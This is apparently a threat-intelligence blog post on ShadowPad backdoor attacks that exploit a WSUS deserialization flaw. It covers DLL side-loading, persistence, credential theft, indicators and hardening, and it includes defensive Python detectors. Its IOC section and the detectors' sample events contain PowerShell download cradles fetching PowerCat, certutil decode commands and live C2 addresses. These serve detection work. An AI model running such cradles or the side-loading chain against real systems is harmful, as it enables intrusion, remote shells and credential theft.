ShadowPad Exploiting WSUS: How a Trusted Update Server Becomes a Silent Backdoor

Overview

ShadowPad is a long-standing, advanced backdoor designed for stealth, persistence, and full remote control of compromised environments. It is not opportunistic malware; it is purpose-built for long-term access and is typically deployed after attackers gain privileged entry into a network.

In the most recent activity observed through December, ShadowPad is being deployed following exploitation of a critical Windows Server Update Services (WSUS) vulnerability. WSUS is a particularly dangerous foothold because the exploited code path executes as SYSTEM and the server is trusted across the domain: every Windows client and downstream update server is configured to talk to it. Once compromised, it gives attackers a platform for credential theft, lateral movement, and long-term persistence that raises little immediate suspicion.


Threat Classification

  • Malware Name: ShadowPad
  • Malware Family: Modular backdoor / remote access trojan
  • Design Goal: Stealth, persistence, modular expansion
  • Primary Objectives: Espionage, credential theft, environment control
  • Secondary Activity Observed: Ransomware deployment, data exfiltration
  • Targeted Environments: Large enterprises, government, telecom, industrial systems, critical infrastructure

ShadowPad is often part of a broader toolset rather than a standalone attack. It is commonly paired with credential theft utilities, lateral movement tooling, and custom loaders.


Initial Access and Exploited Vulnerability

Recent campaigns rely heavily on CVE-2025-59287, a remote code execution flaw in Windows Server Update Services caused by unsafe deserialization.

This vulnerability allows:

  • Unauthenticated access
  • Remote execution of arbitrary code
  • Execution context as NT AUTHORITY\SYSTEM

Attackers do not need stolen credentials or phishing emails. If WSUS is reachable or insufficiently segmented, exploitation can occur directly from the network.


Immediate Post-Exploitation Behavior

Once code execution is achieved, attackers move quickly to stabilize access:

  • WSUS services or the IIS worker process (w3wp.exe) spawn cmd.exe or powershell.exe
  • A lightweight interactive shell is established, commonly via PowerShell-based tools such as PowerCat
  • Attackers avoid custom droppers and instead use native utilities:
    • PowerShell WebClient (DownloadString)
    • curl for direct file retrieval
    • certutil -decode to reconstruct payloads from encoded data

This “living off the land” approach significantly reduces detection by signature-based antivirus: every binary involved is a signed Microsoft component, so the only reliable signals are the parent-child process relationship (a WSUS or IIS process spawning a shell) and the command-line content.


Payload Delivery and Loader Architecture

ShadowPad is delivered using a multi-component loader designed to evade static and behavioral detection.

Execution model:

  1. A legitimate or legitimate-looking executable is placed on disk
  2. A malicious DLL with a name the executable expects to import is placed in the same directory
  3. When the executable is launched, Windows resolves the import from the application's own directory before the system directories, so the malicious DLL is loaded (DLL side-loading, a form of search order hijacking)
  4. The DLL reads a nearby .tmp file containing the encrypted ShadowPad payload and configuration data
  5. The payload is decrypted and executed directly in memory; the decrypted backdoor never exists as a file on disk

Observed artifact examples:

  • ETDCtrlHelper.exe – abused executable used to trigger DLL loading
  • ETDApix.dll – malicious sideloaded DLL
  • 0C137A80.tmp – encrypted ShadowPad payload container

After execution, the core backdoor rarely touches disk again, making forensic recovery difficult.


Persistence Mechanisms

ShadowPad supports multiple persistence methods and often uses more than one simultaneously:

  • Creation of Windows services with generic or system-like names
  • Scheduled tasks configured to run at startup or on intervals
  • Registry Run or RunOnce keys pointing to loader components
  • In some cases the in-memory implant re-creates its persistence entries if an administrator deletes them, so removing a single service or task without evicting the running process is not enough

Persistence mechanisms are usually subtle and designed to survive routine administrative cleanup.


Credential Theft and Privilege Abuse

Once established on a WSUS server, ShadowPad operators typically focus on credentials:

  • Dumping LSASS memory to obtain NTLM hashes and, where legacy caching such as WDigest is enabled, plaintext credentials
  • Harvesting cached credentials and service account passwords
  • Accessing token privileges available to SYSTEM
  • In domain environments, attempting NTDS extraction or replication abuse

Because WSUS servers often interact with domain resources, harvested credentials frequently include high-value administrative accounts.


Lateral Movement and Internal Expansion

After credentials are obtained, attackers expand their reach using legitimate protocols:

  • RDP for interactive access
  • SMB for remote execution and file transfer
  • WMI for command execution
  • Service creation on remote hosts

Because these logons use valid credentials rather than exploits, they look like ordinary administrative activity in authentication logs; what gives them away is the source (a WSUS server has no business opening RDP sessions or admin shares to other hosts), the accounts involved, and the timing.


Command and Control Communication

ShadowPad communicates with its operators using HTTP or HTTPS:

  • Traffic is encrypted and blends into normal web traffic
  • Beacon intervals and endpoints are configurable
  • POST requests are commonly used for command retrieval and data exfiltration

From a network perspective, the traffic often looks like benign outbound web traffic unless closely inspected.


End-to-End Attack Flow

A typical intrusion unfolds as follows:

  1. WSUS server is reachable or insufficiently segmented
  2. CVE-2025-59287 is exploited
  3. SYSTEM-level command execution is achieved
  4. PowerShell or PowerCat establishes a shell
  5. Loader files and payload are downloaded
  6. DLL sideloading executes ShadowPad in memory
  7. Persistence is established
  8. Credentials are harvested
  9. Lateral movement begins
  10. Domain-wide compromise, espionage, or ransomware follows

This progression can occur rapidly or over weeks, depending on attacker objectives.


Indicators of Compromise (IOCs)

Process and Command Indicators

  • w3wp.exe or WSUS services spawning cmd.exe or powershell.exe
  • PowerShell one-liners using IEX, DownloadString, or encoded commands
  • certutil -decode executed on servers

Command Patterns

  • certutil -decode <input> <output>
  • curl http://<ip>:<port>/<file>
  • PowerShell loading PowerCat: IEX (New-Object Net.WebClient).DownloadString('https[:]//raw.githubusercontent.com/.../powercat.ps1')

File Indicators

  • Paired EXE and DLL files in the same directory
  • .tmp files created shortly before execution
  • Unsigned DLLs loaded by signed executables
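
To make the file indicators above (paired EXE and DLL, a .tmp dropped shortly before execution, an unsigned DLL loaded from a writable directory) actionable, here is an added example that correlates Sysmon image-load (Event ID 7) and file-create (Event ID 11) events for the loader chain described in the Payload Delivery section. It is not code from the original post or from any vendor. The events are constructed, the trusted-directory list, the 15-minute correlation window and the C:\ProgramData\Intel path are assumptions, and because Sysmon does not record whether the loading process is itself signed, the check keys on the DLL being unsigned and co-located with the executable outside the Windows and Program Files trees.

```python
"""Added example (not the page's tooling): correlate Sysmon-style image-load
(EID 7) and file-create (EID 11) events to surface the sideloading pattern
described above. All sample events below are constructed, not real logs."""
import json
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Constructed sample telemetry, one Sysmon-style JSON object per line.
SAMPLE_EVENTS = r"""
{"EventID": 11, "UtcTime": "2025-12-01 10:00:05.000", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetFilename": "C:\\ProgramData\\Intel\\0C137A80.tmp"}
{"EventID": 11, "UtcTime": "2025-12-01 10:00:09.000", "Image": "C:\\Windows\\System32\\certutil.exe", "TargetFilename": "C:\\ProgramData\\Intel\\ETDApix.dll"}
{"EventID": 7, "UtcTime": "2025-12-01 10:00:40.000", "Image": "C:\\ProgramData\\Intel\\ETDCtrlHelper.exe", "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll", "Signed": "true", "SignatureStatus": "Valid"}
{"EventID": 7, "UtcTime": "2025-12-01 10:00:41.000", "Image": "C:\\ProgramData\\Intel\\ETDCtrlHelper.exe", "ImageLoaded": "C:\\ProgramData\\Intel\\ETDApix.dll", "Signed": "false", "SignatureStatus": "Unavailable"}
{"EventID": 7, "UtcTime": "2025-12-01 10:01:00.000", "Image": "C:\\Windows\\System32\\svchost.exe", "ImageLoaded": "C:\\Windows\\System32\\wuaueng.dll", "Signed": "true", "SignatureStatus": "Valid"}
{"EventID": 7, "UtcTime": "2025-12-01 11:30:00.000", "Image": "C:\\Users\\admin\\Tools\\procexp64.exe", "ImageLoaded": "C:\\Users\\admin\\Tools\\helper.dll", "Signed": "false", "SignatureStatus": "Unavailable"}
"""

# Assumption: DLLs under these roots are managed by installers, not dropped by hand.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Assumption: a .tmp or DLL written within this window before the load is related.
CORRELATION_WINDOW = timedelta(minutes=15)


def parse_time(value):
    """Parse Sysmon's UtcTime field ('YYYY-MM-DD HH:MM:SS.fff')."""
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S.%f")


def parent_dir(path):
    """Normalised, lower-cased directory of a Windows path, with trailing backslash."""
    return str(PureWindowsPath(path).parent).lower().rstrip("\\") + "\\"


def is_trusted_dir(directory):
    return directory.startswith(TRUSTED_ROOTS)


def find_sideloads(events_text):
    """Return one finding per unsigned DLL loaded from beside its host EXE in a
    non-system directory, enriched with recent file writes to that directory."""
    events = [json.loads(line) for line in events_text.strip().splitlines()]
    creates = [e for e in events if e["EventID"] == 11]
    findings = []
    for e in events:
        if e["EventID"] != 7 or e.get("Signed", "true").lower() == "true":
            continue
        dll = e["ImageLoaded"]
        exe_dir, dll_dir = parent_dir(e["Image"]), parent_dir(dll)
        # Side-loading pattern: DLL sits next to the EXE, outside trusted roots.
        if not dll.lower().endswith(".dll") or dll_dir != exe_dir or is_trusted_dir(dll_dir):
            continue
        load_time = parse_time(e["UtcTime"])

        def recent(c):
            age = load_time - parse_time(c["UtcTime"])
            return timedelta(0) <= age <= CORRELATION_WINDOW

        tmp_files = [c["TargetFilename"] for c in creates
                     if recent(c) and parent_dir(c["TargetFilename"]) == dll_dir
                     and c["TargetFilename"].lower().endswith(".tmp")]
        dll_written = any(recent(c) and c["TargetFilename"].lower() == dll.lower() for c in creates)
        findings.append({
            "exe": e["Image"],
            "dll": dll,
            "tmp_files": tmp_files,
            "dll_recently_written": dll_written,
            # A payload container dropped minutes before the load is the page's full pattern.
            "confidence": "high" if tmp_files or dll_written else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in find_sideloads(SAMPLE_EVENTS):
        print(f"[{f['confidence']}] {f['exe']} loaded {f['dll']}; tmp={f['tmp_files']}")
```

Run on the constructed events, the ETDCtrlHelper.exe load of ETDApix.dll comes back as high confidence with the .tmp container attached, while the unsigned helper.dll beside a tools directory is reported at medium confidence for an analyst to triage. In production, feed the same logic from your SIEM's Sysmon ingestion and add the process's signer from your EDR if it exposes it.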

Network Indicators

  • Outbound connections from WSUS servers to unknown IPs
  • Examples observed:
    • 149.28.78.189[:]42306
    • 163.61.102.245[:]443
  • HTTP POST traffic from servers that normally only contact Microsoft update services
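
A WSUS server's legitimate egress is short: Microsoft Update endpoints during synchronization, and internal hosts such as an upstream WSUS server or domain controllers. The added example below, which is not code from the original post, audits constructed Sysmon network-connection (Event ID 3) events against that baseline, the same check the Command and Control section argues for, and escalates any destination that matches the two IPs listed above. The allowlisted hostname suffixes, the RFC 1918 internal ranges, and the 203.0.113.0/24 sample addresses are assumptions.

```python
"""Added example (not the page's tooling): flag outbound connections from a WSUS
host that fall outside its expected egress baseline. Sample events are
constructed Sysmon-style EID 3 records, not real telemetry."""
import ipaddress
import json
from pathlib import PureWindowsPath

# Constructed sample telemetry. 203.0.113.0/24 is documentation address space.
SAMPLE_EVENTS = r"""
{"EventID": 3, "Image": "C:\\Program Files\\Update Services\\Service\\WsusService.exe", "Initiated": "true", "DestinationIp": "203.0.113.50", "DestinationPort": 443, "DestinationHostname": "download.windowsupdate.com"}
{"EventID": 3, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "Initiated": "true", "DestinationIp": "203.0.113.10", "DestinationPort": 8000, "DestinationHostname": ""}
{"EventID": 3, "Image": "C:\\ProgramData\\Intel\\ETDCtrlHelper.exe", "Initiated": "true", "DestinationIp": "149.28.78.189", "DestinationPort": 42306, "DestinationHostname": ""}
{"EventID": 3, "Image": "C:\\ProgramData\\Intel\\ETDCtrlHelper.exe", "Initiated": "true", "DestinationIp": "163.61.102.245", "DestinationPort": 443, "DestinationHostname": ""}
{"EventID": 3, "Image": "C:\\Program Files\\Update Services\\Service\\WsusService.exe", "Initiated": "true", "DestinationIp": "10.10.1.5", "DestinationPort": 8530, "DestinationHostname": "wsus-upstream.corp.example"}
{"EventID": 3, "Image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "Initiated": "false", "DestinationIp": "10.10.7.23", "DestinationPort": 8530, "DestinationHostname": ""}
"""

# Assumption: hostnames WSUS synchronisation legitimately reaches. Tune for your tenant.
ALLOWED_HOST_SUFFIXES = (
    "windowsupdate.com",
    "update.microsoft.com",
    "download.microsoft.com",
    "delivery.mp.microsoft.com",
)
# Assumption: the organisation's internal ranges are the RFC 1918 blocks.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# The two addresses published in the IOC section of this article.
KNOWN_C2 = {"149.28.78.189", "163.61.102.245"}


def basename(path):
    return PureWindowsPath(path).name.lower()


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def host_allowed(hostname):
    """Exact or subdomain match against the allowlist; an empty name never matches."""
    h = hostname.lower().rstrip(".")
    return bool(h) and any(h == s or h.endswith("." + s) for s in ALLOWED_HOST_SUFFIXES)


def audit_egress(events_text):
    """Return outbound connections that are neither internal nor to an allowed host."""
    findings = []
    for line in events_text.strip().splitlines():
        ev = json.loads(line)
        if ev["EventID"] != 3 or ev["Initiated"] != "true":   # inbound client traffic is expected
            continue
        dst = ev["DestinationIp"]
        if is_internal(dst) or host_allowed(ev.get("DestinationHostname", "")):
            continue
        ioc = dst in KNOWN_C2
        findings.append({
            "image": basename(ev["Image"]),
            "dest": f"{dst}:{ev['DestinationPort']}",
            "ioc_match": ioc,
            "severity": "critical" if ioc else "high",
        })
    return findings


if __name__ == "__main__":
    for f in audit_egress(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['image']} -> {f['dest']} ioc={f['ioc_match']}")
```

One caveat: Sysmon's DestinationHostname is a reverse lookup, and an attacker who controls the PTR record for their server can make it end in an allowlisted suffix. For production use, pin the allowlist to the addresses your DNS logs actually resolved for those names, or better, enforce egress at the proxy or firewall so the log you hunt in records blocks rather than allows.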

Persistence Indicators

  • Newly created services with non-descriptive names
  • Scheduled tasks created outside maintenance windows
  • Registry run keys referencing uncommon paths

Detection Strategy

High-confidence detections:

  • WSUS or IIS processes launching PowerShell or CMD
  • Use of certutil to decode files on servers
  • DLLs loading from writable directories
  • Unexpected outbound internet access from WSUS

Supporting detections:

  • LSASS access attempts
  • RDP/SMB activity originating from WSUS
  • Obfuscated PowerShell execution
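
The high-confidence and supporting detections above, together with the process and command-line indicators from the IOC section and the LSASS activity described under Credential Theft, can be expressed as a small rule set over process telemetry. The block below is an added example, not tooling from the original post or from any vendor: it runs four rules over constructed Sysmon-style process-creation (Event ID 1) and process-access (Event ID 10) events, and it decodes PowerShell -EncodedCommand arguments before matching so a base64-wrapped IEX is not missed. The host name, file paths, the 203.0.113.10 address and the benign-process list for LSASS are assumptions; the certutil rule also covers -urlcache, a download abuse of the same binary that the article does not mention.

```python
"""Added example (not the page's tooling): rule-based triage of Sysmon-style
process-creation (EID 1) and process-access (EID 10) events for the WSUS
post-exploitation chain described above. Sample events are constructed."""
import base64
import json
import re
from collections import Counter
from pathlib import PureWindowsPath

# Constructed sample telemetry, one Sysmon-style JSON object per line (not real logs).
# "SQBFAFgA" is base64 of the UTF-16LE string "IEX".
SAMPLE_EVENTS = r"""
{"EventID": 1, "Host": "WSUS01", "ParentImage": "C:\\Program Files\\Update Services\\Service\\WsusService.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA"}
{"EventID": 1, "Host": "WSUS01", "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10:8000/powercat.ps1')"}
{"EventID": 1, "Host": "WSUS01", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil -decode C:\\Windows\\Temp\\a.txt C:\\Windows\\Temp\\ETDApix.dll"}
{"EventID": 1, "Host": "WSUS01", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\Cleanup-Wsus.ps1"}
{"EventID": 10, "Host": "WSUS01", "SourceImage": "C:\\Windows\\Temp\\ETDCtrlHelper.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"}
{"EventID": 10, "Host": "WSUS01", "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1400"}
"""

WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}      # on a WSUS host, w3wp.exe is the WsusPool worker
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
PS_IMAGES = {"powershell.exe", "pwsh.exe"}
LSASS_BENIGN = {"csrss.exe", "wininit.exe", "services.exe"}   # assumption; tune per environment
PROCESS_VM_READ = 0x0010                              # the access right a credential dumper needs
CRADLE_RE = re.compile(r"\bIEX\b|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient", re.I)
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)


def basename(path):
    return PureWindowsPath(path).name.lower()


def effective_command(cmdline):
    """Return the command line with any -EncodedCommand payload decoded (UTF-16LE) and appended."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le", "ignore")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return cmdline
    return cmdline + " " + decoded


def triage(events_text):
    """Apply the rules and return (rule, host, detail) tuples in event order."""
    findings = []
    for line in events_text.strip().splitlines():
        ev = json.loads(line)
        host = ev.get("Host", "?")
        if ev["EventID"] == 1:
            parent, image = basename(ev["ParentImage"]), basename(ev["Image"])
            cmd = effective_command(ev.get("CommandLine", ""))
            # High confidence: the update service or its IIS worker should never spawn a shell.
            if parent in WSUS_PARENTS and image in SHELLS:
                findings.append(("wsus_spawns_shell", host, f"{parent} -> {image}"))
            # High confidence: certutil used to decode or fetch a payload on a server.
            if image == "certutil.exe" and re.search(r"-(decode|urlcache)", cmd, re.I):
                findings.append(("certutil_decode", host, cmd))
            # Supporting: download cradle in plain or base64-encoded PowerShell.
            if (image in PS_IMAGES or "powershell" in cmd.lower()) and CRADLE_RE.search(cmd):
                findings.append(("powershell_download_cradle", host, cmd))
        elif ev["EventID"] == 10:
            src, target = basename(ev["SourceImage"]), basename(ev["TargetImage"])
            access = int(ev["GrantedAccess"], 16)
            # Supporting: a non-system process opening LSASS with read access.
            if target == "lsass.exe" and access & PROCESS_VM_READ and src not in LSASS_BENIGN:
                findings.append(("lsass_access", host, f"{src} {ev['GrantedAccess']}"))
    return findings


def summarize(findings):
    return Counter(rule for rule, _, _ in findings)


if __name__ == "__main__":
    for rule, host, detail in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {host}: {detail}")
```

On the constructed input, the scheduled PowerShell maintenance script and the csrss.exe query of LSASS (0x1400 carries no PROCESS_VM_READ) produce nothing, while the two shells spawned by WsusService.exe and w3wp.exe, the certutil decode and the LSASS read each fire. On a server that also hosts other IIS sites, narrow the w3wp.exe rule using Sysmon's ParentCommandLine, which names the application pool (WsusPool).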

Prevention and Hardening

  • Patch WSUS immediately to remediate CVE-2025-59287; until the update is applied, Microsoft's published workarounds are to disable the WSUS Server Role or block inbound traffic to ports 8530 and 8531 at the host firewall
  • Restrict access to the WSUS ports (8530/TCP for HTTP, 8531/TCP for HTTPS) to the clients and downstream servers that need them; they should never be reachable from the internet
  • Isolate WSUS from user and internet-facing networks
  • Enforce MFA for all administrative accounts
  • Restrict outbound internet access from servers
  • Monitor and constrain PowerShell usage
  • Deploy EDR detections for DLL sideloading
  • Rotate credentials used on WSUS systems

Incident Response Considerations

If ShadowPad activity is suspected:

  1. Isolate the WSUS server immediately
  2. Preserve memory and logs before rebooting
  3. Assume credentials used on the server are compromised
  4. Hunt for lateral movement across the environment
  5. Remove persistence only after investigation
  6. Reset privileged credentials
  7. Escalate to full incident response if domain access is confirmed

MITRE ATT&CK Alignment

  • Initial Access: Exploit Public-Facing Application (T1190)
  • Execution: PowerShell (T1059.001)
  • Persistence: DLL Search Order Hijacking (T1574.001), Services (T1543), Scheduled Tasks (T1053)
  • Credential Access: OS Credential Dumping (T1003)
  • Lateral Movement: Remote Services (T1021)
  • Command and Control: Web Protocols (T1071.001)

Final Takeaway

ShadowPad activity leveraging WSUS compromises represents a high-impact threat due to the trust and privilege associated with update infrastructure. Once attackers gain a foothold, they can remain undetected for extended periods while quietly expanding access. Organizations should treat WSUS compromise as a potential domain-wide incident and respond accordingly.

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.